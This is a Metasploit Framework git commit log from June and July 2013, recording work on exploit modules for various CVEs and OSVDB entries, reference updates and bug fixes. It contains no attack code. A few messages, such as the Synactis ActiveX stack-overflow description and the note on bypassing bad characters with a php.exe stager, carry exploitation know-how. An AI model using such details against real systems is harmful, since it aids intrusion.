sinn3r
7ef5695867
[FixRM:#8129] - Remove invalid metasploit.com references
...
These "metasploit.com" references aren't related to the vulns,
shouldn't be in them.
2013-07-03 11:52:10 -05:00
jvazquez-r7
c07e65d16e
Improve and clean instantcms_exec
2013-07-03 11:37:57 -05:00
g0tmi1k
2a6056fd2a
exploits/s4u_persistence~Fixed typos+default values
2013-07-03 00:38:50 +01:00
Ricardo Almeida
dd876008f9
Update instantcms_exec.rb
2013-07-02 17:26:14 +01:00
jvazquez-r7
146d1eb27d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-02 10:06:00 -05:00
jvazquez-r7
1110aefe49
Land #2038 , @modpr0be exploit for ABBS Audio Media Player
2013-07-01 23:20:50 -05:00
modpr0be
2e5398470b
remove additional junk, tested and not needed
2013-07-02 09:23:42 +07:00
jvazquez-r7
72f19181d1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-01 16:38:19 -05:00
Ricardo Almeida
dafa333e57
Update instantcms_exec.rb
2013-07-01 22:03:37 +01:00
Tod Beardsley
bc24f99f8d
Various description and title updates
2013-07-01 15:37:37 -05:00
modpr0be
9b8bfa6290
change last junk from rand_text_alpha_upper to rand_text
2013-07-01 23:49:19 +07:00
modpr0be
c631778a38
make a nice way to fill the rest of buffer
2013-07-01 23:39:08 +07:00
Ricardo Almeida
760133d878
Error on line 60
2013-07-01 12:04:03 -04:00
sinn3r
dbce1b36e5
Land #2036 - CVE-2013-3660
...
Thx Tavis, Keebie4e, and Meatballs
2013-07-01 10:55:51 -05:00
Ricardo Almeida
4cd08966ff
added InstantCMS 1.6 PHP Code Injection
2013-07-01 11:44:47 -04:00
modpr0be
478beee38b
remove unnecessary option and make msftidy happy
2013-07-01 18:51:47 +07:00
modpr0be
f16d097c00
clean version, tested on winxp sp3 and win7 sp1
2013-07-01 18:35:50 +07:00
jvazquez-r7
f58f481399
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-30 22:36:46 -05:00
modpr0be
e0ae71e874
minor fixing in the exploit module description
2013-07-01 03:27:06 +07:00
modpr0be
007fddb6bf
remove SEH function, not needed
2013-07-01 03:13:20 +07:00
modpr0be
1e4b69ab03
Added abbs amp exploit module
2013-07-01 03:08:22 +07:00
jvazquez-r7
0ff1cd24a9
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-30 10:03:30 -05:00
jvazquez-r7
867eed7957
Make msftidy happy
2013-06-30 10:01:40 -05:00
jvazquez-r7
db00599d44
Move carberp_backdoor_exec to unix webapp exploits foler
2013-06-30 10:00:14 -05:00
Brian Wallace
d990c7f21f
Dat line
2013-06-29 09:46:36 -07:00
Brian Wallace
ec7c9b039a
Further refactoring requested
2013-06-29 09:45:22 -07:00
jvazquez-r7
a2b8daf149
Modify fail message when exploitation doen't success
2013-06-29 10:45:13 -05:00
jvazquez-r7
a5c3f4ca9b
Modify ruby code according to comments
2013-06-29 08:54:00 -05:00
Brian Wallace
8542342ff6
Merge branch 'carberp_backdoor_exec' of git@github.com:bwall/metasploit-framework.git into carberp_backdoor_exec
2013-06-28 22:45:03 -07:00
Brian Wallace
b8cada9ab0
Applied some refactoring to decrease line count
2013-06-28 22:44:23 -07:00
jvazquez-r7
427e26c4dc
Fix current_pid
2013-06-28 21:36:49 -05:00
jvazquez-r7
32ae7ec2fa
Fix error description and bad variable usage
2013-06-28 21:30:33 -05:00
jvazquez-r7
fb67002df9
Switch from print_error to print_warning
2013-06-28 21:29:20 -05:00
jvazquez-r7
3ab948209b
Fix module according to @wchen-r7 feedback
2013-06-28 20:44:42 -05:00
jvazquez-r7
00416f3430
Add a new print_status
2013-06-28 18:23:49 -05:00
jvazquez-r7
7725937461
Add Module for cve-2013-3660
2013-06-28 18:18:21 -05:00
(B)rian (Wall)ace
9486364cc4
Added Steven K's email
2013-06-28 15:31:17 -07:00
Brian Wallace
fe0e16183c
Carberp backdoor eval PoC
2013-06-28 14:47:13 -07:00
jvazquez-r7
3c1af8217b
Land #2011 , @matthiaskaiser's exploit for cve-2013-2460
2013-06-26 14:35:22 -05:00
jvazquez-r7
81a2d9d1d5
Merge branch 'module_java_jre17_provider_skeleton' of https://github.com/matthiaskaiser/metasploit-framework
2013-06-26 14:32:59 -05:00
jvazquez-r7
90b30dc317
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-26 14:31:52 -05:00
William Vu
e4fb5b327f
Land #2028 , update references for multiple modules
2013-06-26 10:18:27 -05:00
Steve Tornio
6ea622c45e
reference updates
2013-06-26 09:44:56 -05:00
jvazquez-r7
7ab4d4dcc4
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-25 17:34:29 -05:00
James Lee
3e929fb812
Use fixed `write_file` instead of re-implementing
2013-06-25 17:25:14 -05:00
Steve Tornio
5b71013dde
reference updates
2013-06-25 13:41:22 -05:00
jvazquez-r7
4fa789791d
Explain Ranking
2013-06-25 13:10:15 -05:00
jvazquez-r7
127300c62d
Fix also ruby module
2013-06-25 12:59:42 -05:00
jvazquez-r7
1ade467ac9
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-25 11:10:43 -05:00
jvazquez-r7
b32513b1b8
Fix CVE-2013-2171 with @jlee-r7 feedback
2013-06-25 10:40:55 -05:00
jvazquez-r7
3244013b1f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-25 09:48:20 -05:00
jvazquez-r7
c9a7372f9f
Land #2014 , @wchen-r7's exploit for CVE-2013-2171
2013-06-25 09:33:56 -05:00
jvazquez-r7
0c306260be
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-25 09:13:01 -05:00
William Vu
d6374ddfff
Land #2020 , CVE and OSVDB update
2013-06-25 08:17:54 -05:00
sinn3r
4df943d1a2
CVE and OSVDB update
2013-06-25 02:06:20 -05:00
jvazquez-r7
795dd6a02a
Add module for OSVDB 93718
2013-06-24 23:51:28 -05:00
jvazquez-r7
e9fccb8dbd
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-24 22:07:48 -05:00
sinn3r
72847ee4c9
Land #2007 - Add local privilege escalation for ZPanel zsudo
2013-06-24 19:25:27 -05:00
jvazquez-r7
ca8ce363b8
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-24 16:32:55 -05:00
sinn3r
d974e395e4
Add a check by checking uname
2013-06-24 15:54:41 -05:00
sinn3r
6b8e0605c0
Use FileDropper
2013-06-24 15:48:54 -05:00
HD Moore
24b7d19ecc
Fix target regex and wfsdelay
2013-06-24 14:56:43 -05:00
jvazquez-r7
b86b4d955a
Make random strings also length random
2013-06-24 12:01:30 -05:00
jvazquez-r7
98fddb6ce1
up to date
2013-06-24 11:57:11 -05:00
sinn3r
6780566a54
Add CVE-2013-2171: FreeBSD 9 Address Space Manipulation Module
2013-06-24 11:50:21 -05:00
jvazquez-r7
f7650a4b18
Fix wrong local variable
2013-06-24 11:35:26 -05:00
sinn3r
b3d90c68a4
Land #2008 - More OSVDB refs
2013-06-24 01:53:29 -05:00
Matthias Kaiser
8a96b7f9f2
added Java7u21 RCE module
...
Click2Play bypass doesn't seem to work anymore.
2013-06-24 02:04:38 -04:00
jvazquez-r7
31fcb911f2
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-23 21:41:10 -05:00
Steve Tornio
a920127f8c
reference updates for several modules
2013-06-23 20:43:34 -05:00
sinn3r
5b0092ff39
Land #2006 - Ref updates
2013-06-23 18:26:48 -05:00
jvazquez-r7
6672679530
Add local privilege escalation for ZPanel zsudo abuse
2013-06-23 11:00:39 -05:00
jvazquez-r7
b49c4c4e9e
up to date
2013-06-22 18:28:17 -05:00
jvazquez-r7
345773592f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-22 13:54:47 -05:00
jvazquez-r7
04e6167f90
zpanel
2013-06-22 13:54:22 -05:00
jvazquez-r7
e9883fe5b9
Land #2005 , @wchen-r7's exploit for ZPanel htpasswd
2013-06-22 13:24:23 -05:00
jvazquez-r7
2150d9efb0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-22 12:06:18 -05:00
Steve Tornio
427f063c48
fix formatting
2013-06-22 07:32:29 -05:00
Steve Tornio
1e25dedb66
fix formatting
2013-06-22 07:31:47 -05:00
Steve Tornio
14850cd387
reference updates for multiple modules
2013-06-22 07:28:04 -05:00
sinn3r
de659326ce
Land #2003 - Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation
2013-06-21 21:52:32 -05:00
sinn3r
5de7fff685
Credit
2013-06-21 21:38:40 -05:00
sinn3r
339f2a5c83
Hmmm, one extra ','
2013-06-21 21:29:17 -05:00
sinn3r
8d422c9a39
Forgot to randomize the fake pass and remove the payload during testing
2013-06-21 21:27:11 -05:00
sinn3r
e7d75d6d16
Add OSVDB-94038: ZPanel htpasswd Module Username Command Execution
2013-06-21 21:03:10 -05:00
Markus Wulftange
afa0e6c42a
Use CmdStagerVBS instead of CmdStagerTFTP
...
By using `php.exe` as stager, the bad characters can be completely
bypassed. This allows the use of the CmdStagerVBS, which should be
working on all supported Windows systems.
2013-06-22 01:13:03 +02:00
jvazquez-r7
f106b6db50
Add comment with the component version
2013-06-21 17:38:30 -05:00
jvazquez-r7
5fe9a80bf0
Add module for OSVDB 46578
2013-06-21 17:31:40 -05:00
James Lee
2c12a43e77
Add a method for dealing with hardcoded URIs
2013-06-21 15:48:02 -05:00
jvazquez-r7
785639148c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-20 17:18:42 -05:00
William Vu
4cc1f2440d
Land #1996 , references for several modules
2013-06-20 11:32:55 -05:00
Steve Tornio
322ba27f0f
re-order refs
2013-06-20 11:17:23 -05:00
William Vu
22026352e6
Land #1995 , OSVDB reference for Gitorious
2013-06-20 10:51:51 -05:00
William Vu
e4cbd4b174
Land #1994 , OSVDB reference for JBoss
2013-06-20 10:51:28 -05:00
Steve Tornio
66f4424202
fix formatting
2013-06-20 10:41:14 -05:00
Steve Tornio
a3a5dec369
add osvdb ref 94441
2013-06-20 08:03:34 -05:00
Steve Tornio
abea7e6a47
add osvdb ref 76389
2013-06-20 07:55:50 -05:00
Steve Tornio
cab20062a4
add osvdb ref 84706
2013-06-20 07:38:34 -05:00
Steve Tornio
a824a0583e
add osvdb ref 89059
2013-06-20 07:34:15 -05:00
Steve Tornio
89f649ab99
add osvdb ref 89026
2013-06-20 07:28:29 -05:00
Steve Tornio
2b55e0e0a6
add osvdb ref 64171
2013-06-20 07:17:22 -05:00
Steve Tornio
d19bd7a905
add osvdb 85739, cve 2012-5159, edb 21834
2013-06-20 07:01:59 -05:00
Steve Tornio
6cc7d9ccae
add osvdb ref 85446 and edb ref 20500
2013-06-20 06:54:06 -05:00
Steve Tornio
ee21120c04
add osvdb ref 85509
2013-06-20 06:47:10 -05:00
Steve Tornio
ade970afb8
add osvdb ref 89322
2013-06-20 06:44:22 -05:00
Steve Tornio
42690a5c48
add osvdb ref 77492
2013-06-20 06:38:47 -05:00
Steve Tornio
0dca5ede7e
add osvdb ref 78480
2013-06-20 06:07:08 -05:00
Steve Tornio
29bc169507
add osvdb ref 64171
2013-06-20 06:00:05 -05:00
sinn3r
8dfe9b5318
Add login feature
2013-06-20 04:16:23 -05:00
sinn3r
ebde05b783
Improve check
2013-06-20 03:18:33 -05:00
sinn3r
20621d17de
Add CVE-2013-3576 - HP System Management Homepage exploit
2013-06-20 03:08:42 -05:00
jvazquez-r7
fc7670fa5f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-19 23:16:04 -05:00
jvazquez-r7
494ee160af
Fix indent
2013-06-19 23:12:12 -05:00
jvazquez-r7
2d99c46414
Land #1990 , @wchen-r7's exploit for Libretto CMS
2013-06-19 23:11:34 -05:00
sinn3r
079477c57d
Commit final version
2013-06-19 20:35:24 -05:00
jvazquez-r7
869438cb73
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-19 19:57:40 -05:00
sinn3r
62b23bc594
Initial (incomplete) commit
2013-06-19 16:59:15 -05:00
James Lee
81b4efcdb8
Fix requires for PhpEXE
...
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
jvazquez-r7
6d1101b65b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-19 12:14:53 -05:00
sinn3r
d347be35e9
Land #1986 - Restores MoinMoin during exploitation
2013-06-19 12:14:10 -05:00
jvazquez-r7
a894dc83c2
Try restore also at exploiting time
2013-06-19 11:35:52 -05:00
sinn3r
7b0977f897
Change base path
2013-06-19 11:33:45 -05:00
sinn3r
f0c81ed3cc
Correct disclosure date
2013-06-19 03:00:32 -05:00
sinn3r
67593d6ef4
Eh, PHP, not "php"
2013-06-19 02:34:49 -05:00
sinn3r
9c3bd12613
If I can't write, I want to know.
...
It's possible that the upload directory doesn't allow write, the
module should be aware of that. Other reasons may be possible.
2013-06-19 02:32:30 -05:00
sinn3r
19d868748d
Final version
2013-06-19 02:21:01 -05:00
sinn3r
5c1822ea17
Initial commit for havalite module
2013-06-18 19:00:42 -05:00
jvazquez-r7
fd397db6e0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-18 14:09:33 -05:00
sinn3r
b514124997
Land #1979 - OSVDB update
2013-06-18 10:42:09 -05:00
sinn3r
fbd16a2f3e
Land #1978 - OSVDB update
2013-06-18 10:41:33 -05:00
sinn3r
1e46f7df48
Land #1977 - OSVDB update
2013-06-18 10:40:55 -05:00
sinn3r
d0ed9a6687
Land #1976 - OSVDB update
2013-06-18 10:40:00 -05:00
jvazquez-r7
9e3053f24d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-18 10:00:44 -05:00
jvazquez-r7
aa134b0bcc
Land #1973 , @wchen-r7's fix to handle ftp auth correctly
2013-06-18 09:34:55 -05:00
jvazquez-r7
2b46828d9c
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-18 08:27:18 -05:00
Steve Tornio
e278ac5061
add osvdb ref 91841
2013-06-18 06:41:30 -05:00
Steve Tornio
404a9f0669
add osvdb ref 89594
2013-06-18 06:25:57 -05:00
Steve Tornio
27158d89c7
add osvdb ref 89105
2013-06-18 06:15:29 -05:00
Steve Tornio
2afc90a8de
fix typos
2013-06-18 06:05:45 -05:00
Steve Tornio
2c3181b56b
add osvdb ref 90627
2013-06-18 05:59:39 -05:00
sinn3r
070111a520
Land #1975 - Add CVE-2012-6081 (MoinMoin twikidraw Action Traversal)
2013-06-17 22:31:36 -05:00
sinn3r
3223ea799c
An invalid WritablePage option can result the same message as well.
2013-06-17 22:30:44 -05:00
jvazquez-r7
ae1a3e3ca1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-17 20:39:31 -05:00
jvazquez-r7
044bd2101f
Authenticate against the page to modify
2013-06-17 20:34:02 -05:00
Tod Beardsley
4ca9a88324
Tidying up grammar and titles
2013-06-17 16:49:14 -05:00
jvazquez-r7
de1561363e
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-17 16:43:33 -05:00
jvazquez-r7
0bd6ca2a6a
Add module for CVE-2012-6081
2013-06-17 16:13:55 -05:00
sinn3r
820f589df0
Missed this one.
2013-06-17 15:52:53 -05:00
sinn3r
163d3e771b
Handle connect_login return value properly
...
Some modules ignore connect_login's return value, which may result
an EOF if send_cmd() is used later on. All the modules fixed are
the ones require auth according to the module description, or
CVE/vendor/OSVDB info.
2013-06-17 15:48:34 -05:00
William Vu
b51349ed77
Land #1968 , OSVDB reference for ManageEngine
2013-06-17 10:30:05 -05:00
jvazquez-r7
8fac0aaf6b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-17 08:24:39 -05:00
Steve Tornio
e37a0b871f
add osvdb ref 86562
2013-06-17 06:04:54 -05:00
Steve Tornio
6e57ecab59
add osvdb ref 79246 and edb ref 18492
2013-06-17 05:58:00 -05:00
Steve Tornio
e17ccdda3a
add osvdb ref 68662
2013-06-16 18:11:13 -05:00
jvazquez-r7
11bf17b0d6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-15 11:55:22 -05:00
William Vu
0cf2751ec1
Land #1965 , OSVDB reference for pBot
2013-06-15 07:39:25 -05:00
Steve Tornio
d35dd73328
add osvdb ref 84913
2013-06-15 07:30:23 -05:00
William Vu
638175a6be
Land #1964 , OSVDB reference for StorageWorks
2013-06-15 07:27:43 -05:00
Steve Tornio
0c6157694f
add osvdb ref 82087
2013-06-15 07:22:32 -05:00
Steve Tornio
6e8b844954
add osvdb ref 89611
2013-06-15 07:12:44 -05:00
Steve Tornio
63483a979d
add osvdb ref 89611
2013-06-15 07:09:26 -05:00
William Vu
bd17e67f75
Land #1960 , lower ranking for MS13-009
2013-06-14 15:28:06 -05:00
sinn3r
2abf70a1ca
Lower ranking for MS13-009
...
We haven't been able to make this one more reliable, so todb suggests
we lower the ranking first.
2013-06-14 15:24:43 -05:00
sinn3r
d35c3469e8
Fix typo
...
EDB reference
2013-06-14 15:16:20 -05:00
jvazquez-r7
2d083be8e7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-14 13:28:44 -05:00
sinn3r
0d384d23b8
Land #1954 - Fix resource_uri and mp4 file path
2013-06-14 13:15:17 -05:00
jvazquez-r7
060261bb3b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-14 13:15:13 -05:00
sinn3r
933ac88b44
Missing the file param that's needed to download the mp4
2013-06-14 13:13:48 -05:00
sinn3r
d2df3234f4
Land #1955 - mozilla_mchannel.rb undefined agent variable
2013-06-14 11:14:20 -05:00
sinn3r
223807d0df
Land #1956 - fix regex error for mozilla_reduceright.rb
2013-06-14 11:09:49 -05:00
jvazquez-r7
86258e32b1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-13 16:05:03 -05:00
sinn3r
0440c03c7a
Land #1934 - Fix UltraISO Exploit File Creation
2013-06-13 13:57:09 -05:00
jvazquez-r7
95118895d6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-13 13:05:42 -05:00
jvazquez-r7
81813a78fc
Fix module Name
2013-06-13 11:55:23 -05:00
jvazquez-r7
707bc33148
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-13 10:17:28 -05:00
jvazquez-r7
eaba8e7b59
up to date
2013-06-12 15:44:00 -05:00
jvazquez-r7
afb2f83238
Add module for CVE-2012-1533
2013-06-12 14:40:53 -05:00
jvazquez-r7
0b9cf213df
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-12 12:03:10 -05:00
jvazquez-r7
c38eabe481
Fix description, code and perform test
2013-06-12 11:07:03 -05:00
jvazquez-r7
5c8053491f
Add DEP bypass for ntdll ms12-001
2013-06-12 10:41:05 -05:00
jvazquez-r7
a1c7961cbc
Suport js obfuscation for the trigger
2013-06-12 08:06:12 -05:00
jvazquez-r7
5240c6e164
Add module for MS13-037 CVE-2013-2551
2013-06-12 07:37:57 -05:00
Joe Vennix
45da645717
Update ff svg exploit description to be more accurate.
2013-06-11 12:12:18 -05:00
jvazquez-r7
9ea58ba165
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-11 10:40:01 -05:00
sinn3r
081baad68c
Remove variable 'overflow' because it's not used
...
The 'overflow' variable isn't needed
2013-06-11 02:26:45 -05:00
Ruslaideemin
ca0ab8d6ee
maxthon_history_xcs.rb - fix User-agent string
...
request.headers['User-agent'] is incorrect, it should be
request.headers['User-Agent'].
Downloaded following version from oldapps.com to confirm
the exploit code is wrong.
Supported Systems Windows 98, 2000 (Maxthon 2.5.15 Build
1000), XP, Vista, 7, 8
MD5 Checksum F3791637C886A46940876211209F82F4
SHA1 Checksum 039BB218245E5DC1BAB0F57298C68AC487F86323
Release Date 20 October, 2011 (2 years ago )
2013-06-11 13:37:21 +10:00
jvazquez-r7
69c25014ae
Make msftidy happy
2013-06-13 18:58:38 -05:00
sinn3r
12801430e3
Update both ultraiso files to the right fix
2013-06-13 18:44:19 -05:00
Ruslaideemin
4e41e871bb
mozilla_reduceright.rb - fix regex error.
...
[] is character class, and will match on 1, 6, 7, and |.
Where as (16|17) will match on either 16, or 17.
irb(main):053:0> y = /Firefox\/3\.6\.[16|17]/
=> /Firefox\/3\.6\.[16|17]/
irb(main):054:0> x = "Firefox/3.6.13"
=> "Firefox/3.6.13"
irb(main):055:0> x =~ y
=> 0
irb(main):056:0> y = /Firefox\/3\.6\.(16|17)/
=> /Firefox\/3\.6\.(16|17)/
irb(main):057:0> x =~ y
=> nil
2013-06-11 11:52:27 +10:00
Ruslaideemin
996171b35f
mozilla_mchannel.rb undefined agent variable
...
If the TARGET is chosen instead of using the default
automatic, the agent variable will be undefined, which
causes the exploit to fail.
2013-06-11 10:43:47 +10:00
jvazquez-r7
72b871d762
up to date
2013-06-10 16:37:05 -05:00
Ruslaideemin
d91b412661
adobe_flash_sps.rb - resource_uri vs get_resource
...
resource_uri will randomize the returned uri unless
datastore['URIPATH"] is set.
get_resource will return the currently used reosurce_uri
Since the incorrect type is used, this exploit is completely broken.
Tested fix with both URIPATH set to / and unset, and it works after
redirect.
2013-06-11 07:13:02 +10:00
jvazquez-r7
9c44ea0c61
up to date
2013-06-10 13:02:01 -05:00
jvazquez-r7
b20a38add4
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-10 12:22:52 -05:00
sinn3r
0895184e1f
Land #1932 - Actually support OUTPUTPATH datastore option
2013-06-10 11:22:28 -05:00
Tod Beardsley
f58e279066
Cleanup on module names, descriptions.
2013-06-10 10:52:22 -05:00
jvazquez-r7
cae5e871e7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-08 23:24:39 -05:00
Ruslaideemin
cd64e3593c
Fix UltraISO file creation
...
This makes file creation where datastore['FILENAME'] is not used when
a different filename is required, and ends up creating files in the
wrong place.
2013-06-09 12:37:34 +10:00
Ruslaideemin
c6b4290fea
Fix UltraISO Exploit File Creation
...
Both ultraiso_ccd.rb and ultraiso_cue.rb use File.open to create
files, instead of using the create_file() function. This leads
to files being created in the wrong directory.
We work around this by dynamically changing the
file_format_filename function to return the corrected filename.
2013-06-09 09:51:15 +10:00
Ruslaideemin
cb79aa252a
Fix output path in ms10_004_textbytesatom.rb
...
ms10_004_textbytesatom.rb does not write to the local data directory,
instead it writes to the metasploit path (at least, that's where I
started msfrpcd).
This fixes it by using Msf::Config.local_directory
2013-06-09 07:28:48 +10:00
sinn3r
f55edac0ca
Title and description update
2013-06-07 22:38:53 -05:00
sinn3r
a510084f1c
Description change.
2013-06-07 22:35:46 -05:00
jvazquez-r7
600494817d
Fix typo and target name
2013-06-07 21:08:38 -05:00
jvazquez-r7
9025b52951
make the payload build more clear
2013-06-07 18:05:11 -05:00
jvazquez-r7
d76e14fc9c
Add module for OSVDB 93004 - Exim Dovect exec
2013-06-07 17:59:04 -05:00
jvazquez-r7
9d0047ff74
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-07 16:44:52 -05:00
sinn3r
aefcc51704
Land #1924 - Java pwn2own 2013: java_jre17_driver_manager (CVE-2013-1488)
2013-06-07 15:12:09 -05:00
jvazquez-r7
79bfdf3ca6
Add comment to explain the applet delivery methods
2013-06-07 14:20:21 -05:00
jvazquez-r7
641fd3c6ce
Add also the msf module
2013-06-07 13:39:19 -05:00
jvazquez-r7
9c27a294cb
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-07 13:01:37 -05:00
jvazquez-r7
a157e65802
Land #1916 , @wchen-r7's exploit for Synactics PDF
2013-06-07 12:11:45 -05:00
sinn3r
ea2895ac13
Change to AverageRanking
...
Just to play with the firing order for Browser Autopwn, this one
should fire as late as possible.
2013-06-07 12:08:51 -05:00
sinn3r
9c7b446532
Updates description about default browser setting
2013-06-07 11:58:31 -05:00
sinn3r
f3421f2c3a
Fix different landings
2013-06-07 10:26:04 -05:00
jvazquez-r7
0fb77cb4a7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-07 08:44:07 -05:00
sinn3r
da4b18c6a1
[FixRM:#8012] - Fix message data type to int
...
This patch makes sure s.message is actually an int, that way we can
properly stop or enable the service.
2013-06-06 23:49:14 -05:00
sinn3r
e559824dc8
Remove whitespace
2013-06-06 20:08:50 -05:00
sinn3r
d3e57ffc46
Add OSVDB-93754: Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow
...
This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX
component, specifically PDF_IN_1.ocx. When a long string of data is given
to the ConnectToSynactis function, which is meant to be used for the ldCmdLine
argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry
class pointer saved on the stack, and results in arbitrary code execution under the
context of the user.
2013-06-06 20:05:08 -05:00
jvazquez-r7
ea2b7e623d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-06 08:21:39 -05:00
Steve Tornio
4d26299de3
add osvdb ref 93881 and edb ref 21191
2013-06-05 18:57:33 -05:00
jvazquez-r7
e5a17ba227
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-05 09:41:23 -05:00
sinn3r
6d3dcf0cef
Land #1912 - Fixed check for Admins SID in whoami /group output
2013-06-05 02:55:38 -05:00
sinn3r
a3b25fd7c9
Land #1909 - Novell Zenworks Mobile Device Managment exploit & auxiliary
2013-06-05 02:45:45 -05:00
sinn3r
0c1d46c465
Add more references
2013-06-05 02:43:43 -05:00
sinn3r
46aa6d38f8
Add a check for it
2013-06-05 02:41:03 -05:00
sinn3r
a270d37306
Take apart the version detection code
2013-06-05 02:34:35 -05:00
sinn3r
25fe03b981
People like this format better: IP:PORT - Message
2013-06-05 02:26:18 -05:00
sinn3r
02e29fff66
Make msftidy happy
2013-06-05 02:25:08 -05:00
sinn3r
35459f2657
Small name change, don't mind me
2013-06-05 02:18:11 -05:00
sinn3r
227fa4d779
Homie needs a default target
2013-06-05 02:16:59 -05:00
cbgabriel
1032663cd4
Fixed check for Administrators SID in whoami /group output
2013-06-04 18:34:06 -04:00
jvazquez-r7
b3a99affe0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-04 12:07:27 -05:00
steponequit
ed4766dc46
initial commit of novell mdm modules
2013-06-04 09:20:10 -07:00
jvazquez-r7
3111013991
Minor cleanup for miniupnpd_soap_bof
2013-06-04 08:53:52 -05:00
jvazquez-r7
6497e5c7a1
Move exploit under the linux tree
2013-06-04 08:53:18 -05:00
jvazquez-r7
0bf2f51622
Land #1843 , @viris exploit for CVE-2013-0230
2013-06-04 08:52:09 -05:00
jvazquez-r7
86c768ad02
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-04 08:15:28 -05:00
Dejan Lukan
8ced3483de
Deleted some undeeded comments and used the text_rand function rather than static values.
2013-06-04 08:44:47 +02:00
sinn3r
ad87065b9a
Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb
2013-06-04 01:35:13 -05:00
Ruslaideemin
71bc06d576
Fix undefined variable in tomcat_mgr_deploy.rb
...
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯 in `call'
lib/msf/core/thread_manager.rb💯 in `block in spawn'
Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
jvazquez-r7
a5f9ed890b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-03 16:23:12 -05:00
jvazquez-r7
30a019e422
Land #1891 , @wchen-r7's improve for ie_cgenericelement_uaf
2013-06-03 15:35:43 -05:00
jvazquez-r7
4079484968
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-03 15:27:36 -05:00
Tod Beardsley
4cf682691c
New module title and description fixes
2013-06-03 14:40:38 -05:00
sinn3r
c705928052
Landing #1899 - Add OSVDB ref 85462 for esva_exec.rb
2013-06-03 10:40:31 -05:00
Steve Tornio
76faba60b7
add osvdb ref 85462
2013-06-03 06:16:43 -05:00
Steve Tornio
e612a3d017
add osvdb ref 77183
2013-06-03 05:42:56 -05:00
Dejan Lukan
df20e79375
Deleted the handle because it's not required and check() function.
2013-06-03 10:18:43 +02:00
Dejan Lukan
36f275d71a
Changed the send_request_raw into send_request_cgi function.
2013-06-03 10:06:24 +02:00
Dejan Lukan
675fbb3045
Deleted the DoS UPnP modules, because they are not relevant to the current branch.
2013-06-03 09:45:29 +02:00
Dejan Lukan
1ceed1e44a
Added corrected MiniUPnP module.
2013-06-03 09:37:04 +02:00
Dejan Lukan
d656360c24
Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability
2013-06-03 09:37:03 +02:00
Dejan Lukan
39e4573d86
Added CVE-2013-0229 for MiniUPnPd < 1.4
2013-06-03 09:37:03 +02:00
sinn3r
e74c1d957f
Landing #1897 - Add OSVDB ref 93444 for mutiny_frontend_upload.rb
2013-06-03 02:15:35 -05:00
sinn3r
093830d725
